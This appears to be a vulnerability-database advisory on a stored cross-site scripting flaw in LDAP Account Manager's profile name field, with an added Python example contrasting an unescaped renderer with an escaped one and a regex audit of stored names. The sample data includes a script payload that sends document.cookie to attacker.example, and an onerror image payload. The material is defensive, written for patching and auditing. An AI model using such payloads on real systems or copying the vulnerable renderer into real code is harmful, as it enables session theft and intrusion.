CVE-2025-58174: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in LDAPAccountManager lam
LDAP Account Manager (LAM) is a web frontend for managing entries stored in an LDAP directory. LAM before 9.3 allows stored cross-site scripting in the Profile section via the profile name field, which renders untrusted input as HTML and executes a supplied script (for example a script element). An authenticated user with permission to create or edit a profile can insert a script payload into the profile name and have it executed when the profile data is viewed in a browser. This issue is fixed in version 9.3. No known workarounds are mentioned.
AI Analysis
Technical Summary
CVE-2025-58174 is a stored cross-site scripting (XSS) vulnerability affecting LDAP Account Manager (LAM) versions prior to 9.3. LAM is a web-based frontend used to manage LDAP directory entries. The vulnerability arises from improper neutralization of input during web page generation: in the Profile section the stored profile name is written into the page as raw HTML rather than being HTML-entity encoded at render time, so markup placed in the name (for example a script element) is interpreted by the browser. An authenticated user with permission to create or edit profiles can store such a payload once; it then executes in the browser of every user who later views the profile data. Because the payload runs in the victim's LAM session, it can issue requests with that user's privileges; if the session cookie is marked HttpOnly the script cannot read it directly, but it can still drive the application on the victim's behalf. The vulnerability is classified under CWE-79; the correct fix is context-appropriate output encoding, not input filtering alone. Exploitation requires authentication with profile editing rights and user interaction (viewing the profile), and no exploits are currently reported in the wild. The CVSS v3.1 base score is 4.6 (medium severity), reflecting a network attack vector with low complexity, requiring privileges and user interaction, and impacting confidentiality and integrity but not availability. The issue is resolved in LAM version 9.3, with no known workarounds available for earlier versions.
Potential Impact
For European organizations using LDAP Account Manager versions prior to 9.3, this vulnerability poses a moderate risk. LAM is typically an administrative tool used to manage user and group entries in an enterprise directory, so a script executing in an administrator's LAM session can perform the same directory operations that administrator is allowed to perform, as well as read what the administrator can see. That is the realistic impact: unauthorized directory changes or disclosure through the victim's own session, which can be a stepping stone to broader compromise of the identity infrastructure. The requirement for authenticated access with profile editing rights limits the attacker population to internal or trusted users, but a low-privileged LAM account (obtained by an insider or through credential compromise) is sufficient to plant the payload and wait for a higher-privileged administrator to view it. Confidentiality and integrity of user data and administrative sessions are at risk, with potential implications for GDPR and other data protection obligations. The absence of availability impact reduces the risk of service disruption but does not diminish the threat to the trustworthiness of identity management processes.
Mitigation Recommendations
European organizations should prioritize upgrading LDAP Account Manager to version 9.3 or later, where this vulnerability is fixed. Until the upgrade is possible, restrict profile creation and editing rights strictly to trusted administrators, and review existing profile names for HTML markup (angle brackets, event-handler attributes such as onerror=, javascript: URLs); a payload stored before the upgrade should be removed rather than relied upon to be neutralized. A web application firewall with XSS rules in front of the LAM interface can add a temporary layer, but it inspects authenticated form posts and is routinely bypassed by encoding variants, so treat it as a stopgap rather than a fix. Enforcing strong authentication and session controls (short session lifetimes, HttpOnly and SameSite cookie attributes) limits what a compromised account or a hijacked session can achieve. Note that legacy browser-side XSS filters (the X-XSS-Protection header and built-in XSS auditors) have been removed from current browsers and should not be counted on. A Content Security Policy that disallows inline scripts (no 'unsafe-inline' in script-src) would block an injected script element outright; if LAM's own pages depend on inline scripts, such a policy needs nonces or hashes and should be tested before enforcement.
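The following Python script is an added illustration written for this page; it is not LAM code and does not reproduce LAM's implementation. It shows the bug class described above (a stored profile name interpolated into HTML unescaped, beside the same row with entity encoding applied at render time) and the audit step recommended in the mitigations: a triage scan of existing profile names for markup that has no business in a display name. All function names are hypothetical and the sample profile names are constructed for the example.

```python
"""Stored XSS via an unescaped profile name, and a defender-side audit of stored names.

Added example for CVE-2025-58174 (CWE-79). Not LAM's code: function names are
hypothetical and SAMPLE_PROFILE_NAMES is constructed for illustration.
"""
import html
import re

# Constructed sample profile names, as an administrator might see them listed
# in a Profile section. Two carry payloads; the others are legitimate names
# with punctuation that an over-eager filter might wrongly flag.
SAMPLE_PROFILE_NAMES = [
    "default",
    "Finance staff",
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
    '<img src=x onerror="alert(1)">',
    "Marketing (EMEA)",
    'Sales "north"',
]


def render_profile_row_vulnerable(name: str) -> str:
    """Interpolate the stored name directly into HTML.

    This is the pre-9.3 behaviour the advisory describes: whatever was stored
    is emitted as markup, so a <script> element in the name is executed.
    """
    return f"<tr><td>{name}</td></tr>"


def render_profile_row_hardened(name: str) -> str:
    """Same row with HTML-entity encoding applied at output time.

    quote=True also encodes both quote characters, so the encoded value is
    safe inside attribute values as well as in element text.
    """
    return f"<tr><td>{html.escape(name, quote=True)}</td></tr>"


# Triage heuristic for the audit step: a tag opener, an event-handler
# attribute (onerror=, onload=, ...) or a javascript: URL. It is deliberately
# broad; a hit means "inspect this name", not "this is an exploit".
_MARKUP = re.compile(
    r"<\s*/?\s*[a-zA-Z!]"        # "<script", "</script", "<!--", "<img"
    r"|\bon[a-z]+\s*="           # onerror=, onload=, onclick=
    r"|javascript\s*:",          # javascript: URLs in href/src
    re.IGNORECASE,
)


def find_suspicious_profile_names(names):
    """Return the stored names that contain HTML markup and need manual review."""
    return [n for n in names if _MARKUP.search(n)]


def rows_still_contain_markup(names) -> bool:
    """Sanity check for the hardened renderer: after encoding, no stored name
    may contribute a literal '<' to the page. The fixed wrapper is stripped
    before checking so only the encoded value is inspected."""
    for n in names:
        row = render_profile_row_hardened(n)
        inner = row[len("<tr><td>"):-len("</td></tr>")]
        if "<" in inner or ">" in inner:
            return True
    return False


if __name__ == "__main__":
    payload = SAMPLE_PROFILE_NAMES[2]
    print("vulnerable:", render_profile_row_vulnerable(payload))
    print("hardened:  ", render_profile_row_hardened(payload))
    print("review these profile names:")
    for n in find_suspicious_profile_names(SAMPLE_PROFILE_NAMES):
        print("  ", repr(n))
```

Run it as a script to see the two renderings side by side and the audit output; in a real review the list passed to find_suspicious_profile_names would be the profile names exported from the LAM instance. The audit regex is a heuristic for prioritizing manual review and will occasionally flag legitimate names; the encoding in render_profile_row_hardened is the actual control, and it must be applied wherever the stored value is written into HTML, not only in the one view where the bug was found.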
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy
Technical Details
- Data Version: 5.1
- Assigner Short Name: GitHub_M
- Date Reserved: 2025-08-27T13:34:56.189Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 68c993298d6281de8b72eaf5
Added to database: 9/16/2025, 4:41:13 PM
Last enriched: 9/16/2025, 4:41:40 PM
Last updated: 10/29/2025, 5:00:41 PM